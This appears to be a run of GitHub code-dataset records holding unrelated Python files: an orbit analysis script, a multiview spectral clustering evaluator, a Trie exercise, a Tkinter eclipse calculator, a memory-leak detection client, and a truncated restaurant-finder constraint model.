xs = []\n ys = []\n zs = []\n\n xc = []\n yc = []\n zc = []\n\n for i in range(0, len(sink1)):\n dumpfile.append(sink1[i][0])\n xs.append(sink1[i][2])\n ys.append(sink1[i][3])\n zs.append(sink1[i][4])\n\n xc.append(sink2[i][2])\n yc.append(sink2[i][3])\n zc.append(sink2[i][4])\n\n xyzs = numpy.array([xs, ys, zs])\n xyzc = numpy.array([xc, yc, zc])\n\n product = []\n for i in range(0, len(zc)):\n product.append(numpy.dot([xs[i], ys[i], zs[i]], [xc[i], yc[i], zc[i]]))\n\n # print(xyzs)\n # product = xyzc @ xyzs\n print(numpy.min(product))\n print(numpy.max(product))\n print(dumpfile[int(numpy.argmin(product))])\n print(dumpfile[int(numpy.argmax(product))])\n with open('aphelion_perihelion.txt', 'w') as f:\n f.write('aphelion in file ' + str(dumpfile[int(numpy.argmin(product))]) + '\\n')\n f.write('perihelion in file ' + str(dumpfile[int(numpy.argmax(product))]) + '\\n')\n # print(sink1[:][2])\n os.chdir('../../../')\n # exit()\n","repo_name":"joshcalcino/EccenBinary","sub_path":"do_analysis.py","file_name":"do_analysis.py","file_ext":"py","file_size_in_byte":2266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"70889589807","text":"\"\"\"\nGiven a pre-trained model, run mvsc on it, and print scores vs gold standard\n\nwe'll use view1 encoder to encode each of view1 and view2, and then pass that through mvsc algo\n\nthis should probably be folded innto run_clustering.py (originally kind of forked from\nrun_clustering.py, and combined with some things from train_pca.py and train.py)\n\"\"\"\nimport time\nimport random\nimport datetime\nimport argparse\n\nimport sklearn.cluster\nimport numpy as np\nimport torch\n\nfrom metrics import cluster_metrics\nfrom model import multiview_encoders\nfrom proc_data import Dataset\n\ntry:\n import multiview\nexcept Exception as e:\n print('please install https://github.com/mariceli3/multiview')\n print('eg pip install git+https://github.com/mariceli3/multiview')\n raise e\n\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\nBATCH_SIZE = 32\n\n\ndef transform(dataset, perm_idx, model, view):\n \"\"\"\n for view1 utterance, simply encode using view1 encoder\n for view 2 utterances:\n - encode each utterance, using view 1 encoder, to get utterance embeddings\n - take average of utterance embeddings to form view 2 embedding\n \"\"\"\n model.eval()\n latent_zs, golds = [], []\n n_batch = (len(perm_idx) + BATCH_SIZE - 1) // BATCH_SIZE\n for i in range(n_batch):\n indices = perm_idx[i*BATCH_SIZE:(i+1)*BATCH_SIZE]\n v1_batch, v2_batch = list(zip(*[dataset[idx][0] for idx in indices]))\n golds += [dataset[idx][1] for idx in indices]\n if view == 'v1':\n latent_z = model(v1_batch, encoder='v1')\n elif view == 'v2':\n latent_z_l = [model(conv, encoder='v1').mean(dim=0) for conv in v2_batch]\n latent_z = torch.stack(latent_z_l)\n latent_zs.append(latent_z.cpu().data.numpy())\n latent_zs = np.concatenate(latent_zs)\n return latent_zs, golds\n\n\ndef run(\n ref, model_path, num_clusters, num_cluster_samples, seed,\n out_cluster_samples_file_hier,\n max_examples, out_cluster_samples_file,\n data_path, view1_col, view2_col, label_col,\n sampling_strategy, mvsc_no_unk):\n torch.manual_seed(seed)\n np.random.seed(seed)\n random.seed(seed)\n\n id_to_token, token_to_id, vocab_size, word_emb_size, mvc_encoder = \\\n multiview_encoders.load_model(model_path)\n print('loaded model')\n\n print('loading dataset')\n dataset = Dataset(data_path, view1_col=view1_col, view2_col=view2_col, label_col=label_col)\n n_cluster = len(dataset.id_to_label) - 1\n print(\"loaded dataset, num of class = %d\" % n_cluster)\n\n idxes = dataset.trn_idx_no_unk if mvsc_no_unk else dataset.trn_idx\n trn_idx = [x.item() for x in np.random.permutation(idxes)]\n if max_examples is not None:\n trn_idx = trn_idx[:max_examples]\n\n num_clusters = n_cluster if num_clusters is None else num_clusters\n print('clustering over num clusters', num_clusters)\n\n mvsc = multiview.mvsc.MVSC(\n k=n_cluster\n )\n latent_z1s, golds = transform(dataset, trn_idx, mvc_encoder, view='v1')\n latent_z2s, _ = transform(dataset, trn_idx, mvc_encoder, view='v2')\n print('running mvsc', end='', flush=True)\n start = time.time()\n preds, eivalues, eivectors, sigmas = mvsc.fit_transform(\n [latent_z1s, latent_z2s], [False] * 2\n )\n print('...done')\n mvsc_time = time.time() - start\n print('time taken %.3f' % mvsc_time)\n\n lgolds, lpreds = [], []\n for g, p in zip(golds, list(preds)):\n if g > 0:\n lgolds.append(g)\n lpreds.append(p)\n prec, rec, f1 = cluster_metrics.calc_prec_rec_f1(\n gnd_assignments=torch.LongTensor(lgolds).to(device),\n pred_assignments=torch.LongTensor(lpreds).to(device))\n acc = cluster_metrics.calc_ACC(\n torch.LongTensor(lpreds).to(device), torch.LongTensor(lgolds).to(device))\n silhouette = sklearn.metrics.silhouette_score(latent_z1s, preds, metric='euclidean')\n davies_bouldin = sklearn.metrics.davies_bouldin_score(latent_z1s, preds)\n print(f'{datetime.datetime.now()} pretrain: eval prec={prec:.4f} rec={rec:.4f} f1={f1:.4f} '\n f'acc={acc:.4f} sil={silhouette:.4f}, db={davies_bouldin:.4f}')\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--seed', type=int, default=123)\n parser.add_argument('--max-examples', type=int,\n help='since we might not want to cluster entire dataset?')\n parser.add_argument('--mvsc-no-unk', action='store_true',\n help='only feed non-unk data to MVSC (to avoid oom)')\n parser.add_argument('--ref', type=str, required=True)\n parser.add_argument('--model-path', type=str, required=True)\n parser.add_argument('--data-path', type=str, default='./data/airlines_500_merged.csv')\n parser.add_argument('--view1-col', type=str, default='view1_col')\n parser.add_argument('--view2-col', type=str, default='view2_col')\n parser.add_argument('--label-col', type=str, default='cluster_id')\n parser.add_argument('--num-clusters', type=int, help='defaults to number of supervised classes')\n parser.add_argument('--num-cluster-samples', type=int, default=10)\n parser.add_argument('--sampling-strategy', type=str,\n choices=['uniform', 'nearest'], default='nearest')\n parser.add_argument('--out-cluster-samples-file-hier', type=str,\n default='tmp/cluster_samples_hier_{ref}.txt')\n parser.add_argument('--out-cluster-samples-file', type=str,\n default='tmp/cluster_samples_{ref}.txt')\n args = parser.parse_args()\n args.out_cluster_samples_file = args.out_cluster_samples_file.format(**args.__dict__)\n args.out_cluster_samples_file_hier = args.out_cluster_samples_file_hier.format(**args.__dict__)\n run(**args.__dict__)\n","repo_name":"asappresearch/dialog-intent-induction","sub_path":"run_mvsc.py","file_name":"run_mvsc.py","file_ext":"py","file_size_in_byte":5802,"program_lang":"python","lang":"en","doc_type":"code","stars":67,"dataset":"github-code","pt":"2"} +{"seq_id":"71057729006","text":"# A trie (pronounced as \"try\") or prefix tree is a tree data structure used to efficiently store and retrieve keys in a dataset of strings. There are various applications of this data structure, such as autocomplete and spellchecker.\n\n# Implement the Trie class:\n\n# Trie() Initializes the trie object.\n# void insert(String word) Inserts the string wordinto the trie.\n# int countWordsEqualTo(String word) Returns the number of instances of the string word in the trie.\n# int countWordsStartingWith(String prefix)Returns the number of strings in the trie that have the string prefix as a prefix.\n# void erase(String word) Erases the string wordfrom the trie.\n\n# Example 1:\n# Input\n# [\"Trie\", \"insert\", \"insert\", \"countWordsEqualTo\", \"countWordsStartingWith\", \"erase\", \"countWordsEqualTo\", \"countWordsStartingWith\", \"erase\", \"countWordsStartingWith\"]\n# [[], [\"apple\"], [\"apple\"], [\"apple\"], [\"app\"], [\"apple\"], [\"apple\"], [\"app\"], [\"apple\"], [\"app\"]]\n# Output\n# [null, null, null, 2, 2, null, 1, 1, null, 0]\n\n# Explanation\n# Trie trie = new Trie();\n# trie.insert(\"apple\"); // Inserts \"apple\".\n# trie.insert(\"apple\"); // Inserts another \"apple\".\n# trie.countWordsEqualTo(\"apple\"); // There are two instances of \"apple\" so return 2.\n# trie.countWordsStartingWith(\"app\"); // \"app\" is a prefix of \"apple\" so return 2.\n# trie.erase(\"apple\"); // Erases one \"apple\".\n# trie.countWordsEqualTo(\"apple\"); // Now there is only one instance of \"apple\" so return 1.\n# trie.countWordsStartingWith(\"app\"); // return 1\n# trie.erase(\"apple\"); // Erases \"apple\". Now the trie is empty.\n# trie.countWordsStartingWith(\"app\"); // return 0\nfrom typing import Optional\n\n\nclass TrieNode:\n def __init__(self, value=None, word_count=0, prefix_count=0):\n self.value = value\n self.children = [None] * 26\n self.word_count = word_count\n self.prefix_count = prefix_count\n\n def __str__(self) -> str:\n return f\"{self.value}-{self.word_count}-{self.prefix_count}\"\n\n def __repr__(self) -> str:\n return self.__str__()\nclass Trie:\n\n def __init__(self):\n self.root = TrieNode()\n\n def insert(self, word: str) -> None:\n curr = self.root\n for char in word:\n index = ord(char) - 97\n if curr.children[index] is None:\n curr.children[index] = TrieNode(char)\n\n curr.prefix_count += 1\n curr = curr.children[index]\n curr.word_count += 1\n\n def countWordsEqualTo(self, word: str) -> bool: \n curr = self.root\n for char in word:\n index = ord(char) - 97\n if curr.children[index] is None:\n return 0\n curr = curr.children[index]\n\n return curr.word_count\n\n def countWordsStartingWith(self, prefix: str) -> bool:\n curr = self.root\n for char in prefix:\n index = ord(char) - 97\n if curr.children[index] is None:\n return 0\n curr = curr.children[index]\n return curr.prefix_count\n \n def erase_util(self, root: Optional[TrieNode], word: str):\n if root is None:\n return None\n\n if len(word) == 0:\n root.word_count -= 0\n\n if root.word_count > 0:\n return root\n\n if root.prefix_count > 0:\n return root\n else:\n del root\n return None\n \n index = ord(word[0]) - 97\n if not root.children[index]:\n return root\n else:\n child = self.erase_util(root.children[index], word[1:])\n root.prefix_count -= 1\n root.children[index] = child\n return root\n \n\n def erase(self, word: str) -> None:\n self.root = self.erase_util(self.root, word)\n self.root.prefix_count -= 1\n\n\nif __name__ == '__main__':\n trie = Trie()\n print(trie.insert(\"apple\")) # Inserts \"apple\".\n print(trie.insert(\"apple\")) # Inserts another \"apple\".\n print(trie.countWordsEqualTo(\"apple\")) # There are two instances of \"apple\" so return 2.\n print(trie.countWordsStartingWith(\"app\")) # \"app\" is a prefix of \"apple\" so return 2.\n print(trie.erase(\"apple\")) # Erases one \"apple\".\n print(trie.countWordsEqualTo(\"apple\")) # Now there is only one instance of \"apple\" so \n print(trie.countWordsStartingWith(\"app\")) # return 1\n print(trie.erase(\"apple\")) # Erases \"apple\". Now the trie is empty.\n print(trie.countWordsStartingWith(\"app\")) # return 0","repo_name":"ikaushikpal/DS-450-python","sub_path":"Trie/Implement Trie II (Prefix Tree).py","file_name":"Implement Trie II (Prefix Tree).py","file_ext":"py","file_size_in_byte":4606,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"2"} +{"seq_id":"31322788180","text":"from tkinter import *\nfrom tkinter import messagebox\n\n\nimport logging\nfrom os import system as sys\nfrom SolarEclipseCalculator import SolarEclipseCalculator\nfrom LunarEclipseCalculator import LunarEclipseCalculator\nfrom eclipsePlotter import EclipsePlotter\nfrom PIL import ImageTk, Image\n\n\nimport traceback\nimport numpy as np\n\nlogger = logging.getLogger()\n\nclass MyWindow:\n\n\n def __init__(self, win):\n self.lbl_1 = Label(win, text='Select which you want:')\n self.lbl_1.place(x=50, y=50)\n\n self.lbl_2 = Label(win,text='Solar Eclipses')\n self.lbl_2.place(x=60, y=100)\n self.Var1 = IntVar()\n self.btn2 = Radiobutton(win, variable=self.Var1, value=0)\n self.btn2.place(x=150, y=100)\n\n self.lbl_3 = Label(win, text='Lunar Eclipses')\n self.lbl_3.place(x=60, y=130)\n self.btn3 = Radiobutton(win, variable=self.Var1, value=1)\n self.btn3.place(x=150, y=130)\n\n self.lbl_year = Label(win, text='Year:')\n self.lbl_year.place(x=60, y=180)\n self.year_entry = Entry(win)\n self.year_entry.place(x=130, y=180)\n\n self.lbl_month = Label(win, text='Month:')\n self.lbl_month.place(x=60, y=230)\n self.month_entry = Entry(win)\n self.month_entry.place(x=130, y=230)\n self.lbl_month_notice = Label(win, text='(Enter specific month or 13 for whole year)')\n self.lbl_month_notice.place(x=60,y=260)\n\n self.lbl_timestep = Label(win, text='Time Step:')\n self.lbl_timestep.place(x=60, y=300)\n self.timestep_entry = Entry(win)\n self.timestep_entry.place(x=130, y=300)\n\n self.lbl_timestep_notice = Label(win, text='(Suggested Time Step is 60)')\n self.lbl_timestep_notice.place(x=60, y=330)\n\n self.b7 = Button(win, text='Calculate', command=lambda: [self.show_eclipse_times()])\n self.b7.place(x=80, y=380)\n\n self.reset_button = Button(win, text='Reset', command=lambda: self.reset())\n self.reset_button.place(x=180, y=380)\n\n self.plot_button = Button(win, text=\"Plot\", command=lambda: self.plot())\n self.plot_button.place(x=290, y=465)\n\n self.output_listbox = Listbox(win)\n self.output_listbox.place(x=90, y=415)\n\n self.plot_image = Label(win)\n self.plot_image.place(x=350, y=200)\n\n # Used for console testing\n # self.output = Text(win, height=10, width=30)\n # self.output.place(x=400, y=10)\n\n def validate_entry(entry):\n if entry == \"\": return True\n try:\n value = int(entry)\n except ValueError: # oops, couldn't convert to int\n return False\n return 0 <= value <= 100\n\n def check_values(self):\n\n year = self.year_entry.get()\n month = self.month_entry.get()\n timestep = self.timestep_entry.get()\n\n try:\n year = int(year)\n month = int(month)\n timestep = int(timestep)\n except ValueError:\n messagebox.showerror(\"Error\", \"Input must be an integer.\")\n\n if month < 1 or month > 12:\n if month != 13:\n messagebox.showerror(\"Error\", \"Months must be between 1 and 12, or 13\")\n self.reset()\n\n if timestep > 60 or timestep < 1:\n messagebox.showerror(\"Error\", \"Time Step must be between 1 and 60\")\n self.reset()\n if year < 1550 or year > 2650:\n messagebox.showerror(\"Error\", \"Year must be between 1550 and 2650\")\n\n\n\n\n\n def show_eclipse_times(self):\n \"\"\"\n For date user entered, calculates the start times when eclipse\n will happen.\n \"\"\"\n global months, year\n\n self.check_values()\n\n eclipse_check = int(self.Var1.get())\n if eclipse_check == 0:\n solar_eclipse_check = 1\n lunar_eclipse_check = 0\n elif eclipse_check == 1:\n solar_eclipse_check = 0\n lunar_eclipse_check = 1\n else:\n print(\"No eclipse selected\")\n\n year = int(self.year_entry.get())\n month = int(self.month_entry.get())\n timestep = int(self.timestep_entry.get())\n\n counter = 0\n # Solar eclipse only calculator\n if solar_eclipse_check == 1 and lunar_eclipse_check == 0:\n\n\n eclipse_dates, months = SolarEclipseCalculator(year, month, timestep).DetermineTimes()\n\n for i in range(1,13,1):\n if eclipse_dates[i][0] != 0:\n self.output_listbox.insert(END, eclipse_dates[i][0])\n counter += 1\n else:\n pass\n if counter == 0:\n pass\n #self.output.insert(END, '{}\\n'.format(\"None Found for that month/year!\"))\n\n # Lunar Eclipse only calculator\n elif solar_eclipse_check == 0 and lunar_eclipse_check == 1:\n\n eclipse_dates, months = LunarEclipseCalculator(year, month, timestep).DetermineTimes()\n\n counter = 0\n for i in range(1, 13, 1):\n if eclipse_dates[i][0] != 0:\n self.output_listbox.insert(END, eclipse_dates[i][0])\n counter += 1\n else:\n pass\n if counter == 0:\n pass\n #self.output.insert(END, '{}\\n'.format(\"None Found for that month/year!\"))\n\n def reset(self):\n \"\"\" Clears the entry fields.\"\"\"\n self.year_entry.delete(0, 'end')\n self.month_entry.delete(0, 'end')\n self.timestep_entry.delete(0, 'end')\n #self.Var1.set(\"\")\n self.Var1.set(0)\n self.output_listbox.delete(0, 'end')\n\n def plot(self):\n \"\"\"\n Generates a plot of the trace of the solar eclipse as it travels\n across the earth's surface.\n \"\"\"\n\n for i in self.output_listbox.curselection():\n selected_month = months[i]\n\n eclipse_dates, _ = SolarEclipseCalculator(year, selected_month, 10)\\\n .DetermineTimes()\n\n lat, lon = EclipsePlotter(eclipse_dates, month=selected_month).latANDlonFinder()\n\n # Class which plots those points onto a graph\n _ = EclipsePlotter(eclipse_dates, month=selected_month).plotter(lat, lon)\n # self.output.insert(END, selected_month)\n\n # Plotting of the generated image\n earth_image = Image.open('./generated_plot.png')\n earth_image = earth_image.resize((400, 200))\n self.img = ImageTk.PhotoImage(earth_image)\n self.plot_image.configure(image=self.img)\n\n\nwindow=Tk()\nmywin=MyWindow(window)\nwindow.title('Eclipse Calculator')\nwindow.geometry(\"800x600\")\nwindow.mainloop()\n","repo_name":"tylera277/solarAndLunarEclipsePredictor","sub_path":"GUI/GUI.py","file_name":"GUI.py","file_ext":"py","file_size_in_byte":6698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"13936955029","text":"import sys\nimport rpc.ws\nimport edleak.api\nimport edleak.slice_runner\n\ndef usage():\n print('autodetect [period] [duration]')\n\ndef print_leaker(leaker):\n print('-------------------------------')\n print('class : ' + leaker['leak_factor']['class'])\n print('leak size : ' + str(leaker['leak_factor']['leak']))\n print('call-stack: ')\n for caller in leaker['stack']:\n print(' ' + caller)\n\nif __name__ == '__main__':\n if len(sys.argv) != 3:\n usage()\n sys.exit(-1)\n\n period = int(sys.argv[1])\n duration = int(sys.argv[2])\n ws_rpc = rpc.ws.WebService(\"localhost\", 8080)\n el = edleak.api.EdLeak(ws_rpc)\n runner = edleak.slice_runner.SliceRunner(el)\n\n # First run, to find the leakers\n print('Starting 1st run...')\n asset = runner.run(period, duration)\n allocers = asset.getAllocerList()\n leakers = [l for l in allocers if l['leak_factor']['leak'] > 0 and\n (l['leak_factor']['class'] == 'linear' or\n l['leak_factor']['class'] == 'exp')]\n\n if len(leakers) == 0:\n print('No leaks found.')\n sys.exit(0)\n\n print(str(len(leakers)) + ' leaks found. Starting 2nd run to retrieve callstacks...')\n for leaker in leakers:\n el.addStackWatch(leaker['id'])\n\n asset = runner.run(period, duration)\n allocers = asset.getAllocerList()\n leakers = [l for l in allocers if l['leak_factor']['leak'] > 0 and\n (l['leak_factor']['class'] == 'linear' or\n l['leak_factor']['class'] == 'exp')]\n\n\n for leaker in leakers:\n if len(leaker['stack']) > 1:\n print_leaker(leaker)\n","repo_name":"tpham3783/edKit","sub_path":"client/python/examples/edleak_autodetect.py","file_name":"edleak_autodetect.py","file_ext":"py","file_size_in_byte":1556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"27981595495","text":"\"\"\"\nNicholas Falconi\nLizzy Klosa\nKaitlyn hung\nAlex baldassare\n\nCISC 204\nModelling project\nWed december 9th 2020\nProfessor Muise\n\"\"\"\n\n#Import\nfrom nnf import Var\nfrom nnf import Or\nimport nnf\nfrom lib204 import Encoding\nfrom csvReader import readCSV\n\n'''\nCustomer class\n\nUsed to create a class containing the various restrictions a \nperson might have with a restaurant\nParamaters:\n price: Price range being searched for\n diet: any diet restrictions\n dine_opt: preferred dining options\n'''\nclass customer:\n def __init__(self, price_opt, diet_opt, dine_opt,distance):\n self.userprice = price_opt\n self.userdiet = diet_opt\n self.userdine_opt = dine_opt\n self.distance = distance\n\n#Defining variables for encoding\n\n#Price point variables\nlow = Var('low')\nmed = Var('med')\nhigh = Var('high')\n\n#Dietary restriction food options variables\nvegetarian = Var('vegetarian')\nvegan = Var('vegan')\ngluten = Var('gluten')\nlactose = Var('lactose')\n\n#Dining variables\ndine_in = Var('dine-in')\ntake_out = Var('take-out')\ndelivery = Var('delivery')\n\n#Distance variables\ntime_under_10 = Var('under 10')\ntime_10_to_20 = Var('10 to 20')\ntime_over_20 = Var('over 20')\n\n\n#Constraints\n\n\"\"\"\nIf the user selected a price constraint and it matches \n$,$$,$$$. If the restaurant matches the price point then\nthe constraint will get returned so that its only holds true \nfor that instance.\n\nParameters: Restaurant object, Customer object\nReturns: A price constraint\n\"\"\"\ndef price_constraint(restaurant,customer):\n \n #For low price point\n if \"low\" in customer.userprice:\n if restaurant.price == \"$\":\n return low & ~med & ~high\n else:\n return low & ~low\n\n #For the med price point\n if \"med\" in customer.userprice:\n if restaurant.price == \"$$\":\n return med & ~high & ~low\n else:\n return med & ~med\n\n #For the high price point\n if \"high\" in customer.userprice:\n if restaurant.price == \"$$$\":\n return high & ~low & ~med\n else:\n return high & ~high\n\n\"\"\"\nIf the user selected a single dietary restriction the\nappropriate constraint will get returned so it only \nholds true for that instance.\n\nParameters: Restaurant object, Customer object\nReturns: A single dietary restriction constraint\n\"\"\"\ndef single_diet_constraint(restaurant, customer):\n \n #For gluten free \n if 'gluten' in customer.userdiet:\n if 'TRUE' in restaurant.diet[2]:\n return gluten & ~vegan & ~vegetarian & ~lactose\n else:\n return ~gluten & gluten\n\n #For lactose\n elif 'lactose' in customer.userdiet:\n if 'TRUE' in restaurant.diet[3]:\n return ~gluten & ~vegan & ~vegetarian & lactose\n else:\n return ~lactose & lactose\n\n #For vegetarian\n elif 'vegetarian' in customer.userdiet:\n if 'TRUE' in restaurant.diet[1]:\n return ~gluten & ~vegan & vegetarian & ~lactose\n else:\n return ~vegetarian & vegetarian\n\n #For vegan\n elif 'vegan' in customer.userdiet:\n if 'TRUE' in restaurant.diet[0]:\n return ~gluten & vegan & ~vegetarian & ~lactose\n else:\n return ~vegan & vegan\n\n\"\"\"If the user selected two dietary restrictions the \nappropriate constrain will get returned so it only \nholds true for that instance \n\nParameters: Restaurant object, Customer object\nReturns: A single two dietary restriction constraint\n\"\"\"\ndef two_diet_constraint(restaurant, customer):\n \n #For vegetarian and vegan customers\n if ('vegetarian' in customer.userdiet) and ('vegan' in customer.userdiet):\n if ('TRUE' in restaurant.diet[0]) and ('TRUE' in restaurant.diet[1]):\n return vegetarian & vegan & ~lactose & ~gluten\n else: \n return vegetarian & ~vegetarian\n \n #For vegan and lactose free customers\n elif ('vegan' in customer.userdiet) and ('lactose' in customer.userdiet): \n if ('TRUE' in restaurant.diet[0]) and ('TRUE' in restaurant.diet[3]):\n return ~vegetarian & vegan & lactose & ~gluten\n else: \n return vegan & ~vegan\n\n #For vegetarian and gluten free customers\n elif ('vegan' in customer.userdiet) and ('gluten' in customer.userdiet): \n if ('TRUE' in restaurant.diet[0]) and ('TRUE' in restaurant.diet[2]):\n return ~vegetarian & vegan & ~lactose & gluten\n else: \n return vegan & ~vegan\n #For gluten free and lactose free customers\n elif ('gluten' in customer.userdiet) and ('lactose' in customer.userdiet): \n if ('TRUE' in restaurant.diet[2]) and ('TRUE' in restaurant.diet[3]):\n return ~vegetarian & ~vegan & lactose & gluten\n else: \n return gluten & ~gluten\n\n #For gluten free and vegitarian customers\n elif ('gluten' in customer.userdiet) and ('vegitarian' in customer.userdiet): \n if ('TRUE' in restaurant.diet[2]) and ('TRUE' in restaurant.diet[1]):\n return vegetarian & ~vegan & ~lactose & gluten\n else: \n return gluten & ~gluten\n #For lactose free and vegetarian customers\n elif ('lactose' in customer.userdiet) and ('vegitarian' in customer.userdiet): \n if ('TRUE' in restaurant.diet[1]) and ('TRUE' in restaurant.diet[1]):\n return vegetarian & ~vegan & lactose & ~gluten\n else: \n return lactose & ~lactose\n\n\n\"\"\"If the user selected three dietary restrictions the \nappropriate constrain will get returned so it only \nholds true for that instance \n\nParameters: Restaurant object, Customer object\nReturns: a single three dietary constraint\n\"\"\"\ndef three_diet_constraint(restaurant,customer):\n\n # For vegetarian and vegan and gluten free customers\n if ('vegetarian' in customer.userdiet) and ('vegan' in customer.userdiet) and ('gluten' in customer.userdiet):\n if ('TRUE' in restaurant.diet[0]) and ('TRUE' in restaurant.diet[1]) and ('TRUE' in restaurant.diet[2]):\n return vegetarian & vegan & ~lactose & gluten\n else: \n return vegetarian & ~vegetarian\n\n # For vegetarian and vegan and lactose free customers\n elif ('vegetarian' in customer.userdiet) and ('vegan' in customer.userdiet) and ('lactose' in customer.userdiet):\n if ('TRUE' in restaurant.diet[0]) and ('TRUE' in restaurant.diet[1]) and ('TRUE' in restaurant.diet[3]):\n return vegetarian & vegan & lactose & ~gluten\n else: \n return vegetarian & ~vegetarian\n\n # For gluten free and vegan and lactose free customers\n elif ('gluten' in customer.userdiet) and ('vegan' in customer.userdiet) and ('lactose' in customer.userdiet):\n if ('TRUE' in restaurant.diet[2]) and ('TRUE' in restaurant.diet[1]) and ('TRUE' in restaurant.diet[3]):\n return ~vegetarian & vegan & lactose & gluten\n else: \n return vegetarian & ~vegetarian\n\n\"\"\"If the user selected all dietary restrictions the \nappropriate constrain will get returned so it only \nholds true for that instance \n\nParameters: Restaurant object, Customer object\nReturns: a single all dietary constraint\n\"\"\"\ndef all_diet_constraint(restaurant,customer):\n \n # For users that have all the dietary restrictions\n if ('vegetarian' in customer.userdiet) and ('vegan' in customer.userdiet) and ('gluten' in customer.userdiet) and ('lactose' in customer.userdiet):\n if ('TRUE' in restaurant.diet[0]) and ('TRUE' in restaurant.diet[1]) and ('TRUE' in restaurant.diet[2]) and ('TRUE' in restaurant.diet[3]):\n return vegetarian & vegan & lactose & gluten\n else: \n return vegetarian & ~vegetarian\n\n\"\"\"If the user selected one dining restrictions the \nappropriate constrain will get returned so it only \nholds true for that instance \n\nParameters: Restaurant object, Customer object\nReturns: a single dining constraint\n\"\"\"\ndef one_dining_constraints(restaurant, customer):\n \n # For dine in customers\n if 'dine-in' in customer.userdine_opt:\n if restaurant.delivery[0] == 'TRUE':\n return dine_in\n else:\n return ~dine_in & dine_in \n\n # For take out customers\n elif 'take-out' in customer.userdine_opt:\n if restaurant.delivery[1] == 'TRUE':\n return take_out\n else:\n return ~take_out & take_out\n\n # For delivery customers\n elif 'delivery' in customer.userdine_opt:\n if restaurant.delivery[2] == 'TRUE':\n return delivery\n else:\n return ~delivery & delivery\n\n\"\"\"If the user selected two dining restrictions the \nappropriate constrain will get returned so it only \nholds true for that instance \n\nParameters: Restaurant object, Customer object\nReturns: two dining constraint\n\"\"\"\ndef two_dining_constraints(restaurant, customer):\n \n #For users that want dine in and take out\n if ('dine-in' in customer.userdine_opt) and ('take-out' in customer.userdine_opt):\n if restaurant.delivery[0] == 'TRUE' and restaurant.delivery[1] == 'TRUE':\n return dine_in & take_out & ~delivery\n else:\n return ~dine_in & dine_in \n #For users that want Dine in and Delivery\n elif ('dine-in' in customer.userdine_opt) and ('delivery' in customer.userdine_opt):\n if restaurant.delivery[0] == 'TRUE' and restaurant.delivery[2] == 'TRUE':\n return dine_in & ~take_out & delivery\n else:\n return ~dine_in & dine_in\n \n #For users that want Take out and Delivery\n elif ('take-out' in customer.userdine_opt) and ('delivery' in customer.userdine_opt):\n if restaurant.delivery[1] == 'TRUE' and restaurant.delivery[2] == 'TRUE':\n return ~dine_in & take_out & delivery\n else:\n return ~dine_in & dine_in\n\n\"\"\"If the user selected all dining restrictions the \nappropriate constrain will get returned so it only \nholds true for that instance \n\nParameters: Restaurant object, Customer object\nReturns: all dining constraint\n\"\"\"\ndef all_dining_constraints(restaurant, customer):\n \n # For users that want dine in, Take out and delivery\n if ('take-out' in customer.userdine_opt) and ('delivery' in customer.userdine_opt) and ('dine-in' in customer.userdine_opt):\n if restaurant.delivery[0] == 'TRUE' and restaurant.delivery[1] == 'TRUE' and restaurant.delivery[2] == 'TRUE':\n return dine_in & take_out & delivery\n else:\n return ~dine_in & dine_in \n\n\"\"\"If the user selected distance restrictions the \nappropriate constrain will get returned so it only \nholds true for that instance \n\nParameters: Restaurant object, Customer object\nReturns: distance constraint\n\"\"\"\ndef distanceConstraint(restaurant,customer):\n \n #For customers that want under 10 to campus\n if customer.distance == 'under 10':\n if restaurant.distance[0] == 'TRUE':\n return time_under_10 & ~time_10_to_20 & ~time_over_20\n else:\n return time_under_10 & ~time_under_10\n\n # For customers that want 10-20 min to campus\n if customer.distance == '10 to 20':\n if restaurant.distance[1] == 'TRUE':\n return time_10_to_20 & ~time_under_10 & ~time_over_20\n else:\n return time_10_to_20 & ~time_10_to_20\n\n # For customers that dont mind over the distance being over 20 minutes to campus\n if customer.distance == 'over 20':\n if restaurant.distance[2] == 'TRUE':\n return time_over_20 & ~time_10_to_20 & ~time_under_10\n else:\n return time_over_20 & ~time_over_20\n\n\"\"\"\nThis function is where the constraints get added to our\ntheory.\n\nParameters: Restaurant object and Customer object\n\"\"\"\ndef example_theory(restaurant,customer):\n\n # Shorter variables for the objects\n r = restaurant\n c = customer\n\n # Defining encoding variable\n E = Encoding()\n\n # Add distance constraint\n E.add_constraint(distanceConstraint(r,c))\n E.add_constraint(price_constraint(r,c))\n\n # Add dining constraints\n if len(user.userdine_opt) == 1:\n E.add_constraint(one_dining_constraints(r,c))\n elif len(user.userdine_opt) == 2:\n E.add_constraint(two_dining_constraints(r,c))\n elif len(user.userdine_opt) == 3:\n E.add_constraint(all_dining_constraints(r,c))\n\n # Add Diet constraints\n if len(user.userdiet) == 1:\n if 5 in user.userdiet:\n pass\n else:\n E.add_constraint(single_diet_constraint(r,c))\n elif len(user.userdiet) == 2:\n E.add_constraint(two_diet_constraint(r,c))\n elif len(user.userdiet) == 3:\n E.add_constraint(three_diet_constraint(r,c))\n elif len(user.userdiet) == 4:\n E.add_constraint(all_diet_constraint(r,c))\n\n # return the Encoding variable\n return E\n\n \n\n\"\"\"\nMain method: Where the implementation happens. The theory gets solved \nwhere a sorted list from best result to worst result is displayed\nto the screen. \n\nThe user also inputs their prefrences\n\"\"\"\nif __name__ == \"__main__\":\n # This is where we will get user input information\n flag = True\n restaurant_list = readCSV()\n\n # While loop to start\n while flag:\n\n # creating example theory\n # T = example_theory()\n # Asking if user wants to continue or exit\n prog_exit = input('Welcome to the Queens restuarant finder! Press Q to quit or enter to continue.\\n')\n\n # if statement to exit\n if prog_exit.lower() == 'q':\n break\n\n # Getting users price range information\n user_price = int(input('Please select a price range: \\n 1. $ - most affordable'\\\n '\\n 2. $$ - intermediate \\n 3. $$$ - most expensive\\n'))\n\n # Telling user which price was selected as well as some exception handling\n if user_price in [1,2,3]:\n if user_price == 1:\n price = 'low'\n print('You selected $.')\n elif user_price == 2:\n price = 'med'\n print('You selected $$.')\n else:\n price = 'high'\n print('You selected $$$')\n else:\n print('Invalid input: Must be either option 1, 2 or 3')\n 